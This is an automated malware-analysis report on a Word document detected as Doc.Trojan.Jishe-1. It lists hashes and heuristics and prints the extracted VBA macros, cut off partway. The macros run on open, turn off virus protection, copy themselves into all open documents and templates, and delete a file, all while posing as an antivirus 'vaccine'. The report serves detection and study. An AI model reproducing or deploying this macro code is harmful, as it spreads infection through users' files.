Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6b44ff65e6f5a19c…

MALICIOUS

Office (OLE)

72.0 KB Created: 2001-05-03 02:34:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: dd33dd082f64fb00aba5a47d211c7a80 SHA-1: 8cb3a45ea83357fd5a30cf5f1bf97728512b741d SHA-256: 6b44ff65e6f5a19cbfab0d249e929c104f69ea82249513be4bec54a099f6536c
200 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file contains legacy WordBasic and VBA macros, including AutoOpen and Document_Open, indicating malicious intent. The document body is presented as an official notification about technical innovation projects, a common lure to trick users into enabling macros. The presence of these macros and the ClamAV detection strongly suggest a malicious document designed to execute arbitrary code upon opening.

Heuristics 5

  • ClamAV: Doc.Trojan.Jishe-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jishe-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46041 bytes
SHA-256: 7ef35b57547ffbd74c27222bd720df74d76fe50c85f1b8d9258faa47990f21e3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'This is a macro-virus prevention and removal program I wrote while learning; it can prevent infection by some Word macro viruses
'It relies on a large number of macro-virus signatures; if you find a macro virus this vaccine cannot handle,
'please contact me promptly; you may also modify this program yourself to strengthen the vaccine
'Fighting viruses is like fighting crime in society: it takes everyone's joint effort
'You are welcome to join and become a fighter; perhaps you are the hero everyone has been waiting for
'Program design: 冀慎华
'Office phone:
'E-mail address: club@263.net
Const answer0 = "FreeWordMacroVirusKiller" 'Keep compatibility with earlier versions
Const answer1 = "MyMacroVirusKillerV1.0"
Const answer2 = "MyMacroVirusKillerV2.0"
Const answer3 = "MyMacroVirusKillerV2.2" 'Marker for this program
'Version 2.0
Private Sub Document_Open()
    CloseVirusProtection
    'Check whether the opened document contains a virus
    If ScanVirus Then
        Load VirusReport
        VirusReport.Show
    Else
        InfectAll
    End If
End Sub

Attribute VB_Name = "JiShenhua"
'This is a macro-virus prevention and removal program I wrote while learning; it can prevent infection by some Word macro viruses
'It relies on a large number of macro-virus signatures; if you find a macro virus this vaccine cannot handle,
'please contact me promptly; you may also modify this program yourself to strengthen the vaccine
'Fighting viruses is like fighting crime in society: it takes everyone's joint effort
'You are welcome to join and become a fighter; perhaps you are the hero everyone has been waiting for
'Program design: 冀慎华
'Office phone:
'E-mail address: club@263.net
Option Explicit 'Variables must be declared before they are used
Public pVirusReport As String 'Virus description text
Private Const cMyID As String = "MyMacroVirusKiller" 'Code marker for this program
Private Const cMyVersion As String = "V2.2" 'Version of this program
Private Const cMyModule As String = "JiShenhua" 'Module name of this program
Private Const cMyUserForm As String = "VirusReport" 'UserForm name of this program
Private Const cLinesofThisDocument As Integer = 24 'Total number of code lines in the ThisDocument module
Private Const cOK As Integer = 0 'Everything normal
Private Const cDocHasModuleElse As Integer = 1 'Other modules exist
Private Const cDocHasCodeElse As Integer = 2 'Other code exists in the ThisDocument module
Private Const cDocHasAllElse As Integer = 3 'Other code exists in the ThisDocument module, and other modules exist
Private Const cDocProtected As Integer = 4 'The document is protected
Private Const cDocHasOldVersion As Integer = 8  'The document contains an old version of this virus-killer module
'Runs automatically when a document is opened
Sub AutoOpen()
    CloseVirusProtection
    'Check whether the opened document contains a virus; if it does, report to the user
    If ScanVirus Then
        Load VirusReport
        VirusReport.Show
    Else
        InfectAll
    End If
End Sub
'Runs automatically when a new document is created
Sub AutoNew()
    CloseVirusProtection
    Infect Word.ActiveDocument
End Sub
'Before Word closes, clean the virus out of the autoexec.dot file
Sub AutoExit()
    Const AutoDotFile = "C:\AUTOEXEC.DOT"
    If Dir(AutoDotFile) <> "" Then
        Kill AutoDotFile
    End If
End Sub
'Copy this program's code and modules from the specified file into all open documents and templates
Public Function InfectAll() As Boolean
    Dim myDoc As Document, myTemp As Template
    'Write this code into the open documents
    For Each myDoc In Documents
        Infect myDoc
    Next myDoc
    'Write this code into the Word templates
    For Each myTemp In Templates
        Infect myTemp
    Next myTemp
    InfectAll = True
End Function
'Remove the virus modules and code from all open documents and templates
Public Function ClearVirus() As Boolean
    Dim myDoc As Document, myTemp As Template
    Dim Cleared As Boolean
    
    ClearVirus = True
    'Check all documents and clean them
    For Each myDoc In Documents
        Cleared = ClearDocument(myDoc)
        If Not Cleared Then
            MsgBox "病毒清除工作不成功,请检查原因。", vbOKOnly, myDoc.Name
            ClearVirus = False
        End If
    Next myDoc
    'Check all templates and clean them
    For Each myTemp In Templates
        Cleared = ClearDocument(myTemp)
        If Not Cleared Then
            MsgBox "病毒清除工作不成功,请检查原因。", vbOKOnly, myTemp.Name
            ClearVirus = False
        End If
    Next myTemp
End Function
'Check whether any open document or template contains a virus; if so, return a virus description string
Public Function ScanVirus() As Boolean
    Dim Ret As Integer, myDoc As Document, myTemp As Template
    
    ScanVirus = False
    pVirusReport = ""
    'Check all open documents for viruses
    For Each myDoc In Documents
        Ret = ScanDocument(myDoc)
        Select Case Ret
            Case cOK, cDocProtected
            Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse, cDocHasOldVersion
                ScanVirus = True
            Case Else
                MsgBox "函数ScanDocument返回错误代码,系统无法识别。", vbOKOnly, "系统出错"
        End Select
    Next myDoc
    'Check all templates
    For Each myTemp In Templates
        Ret = ScanDocument(myTemp)
        Select Case Ret
            Case cOK, cDocProtected
 
... (truncated)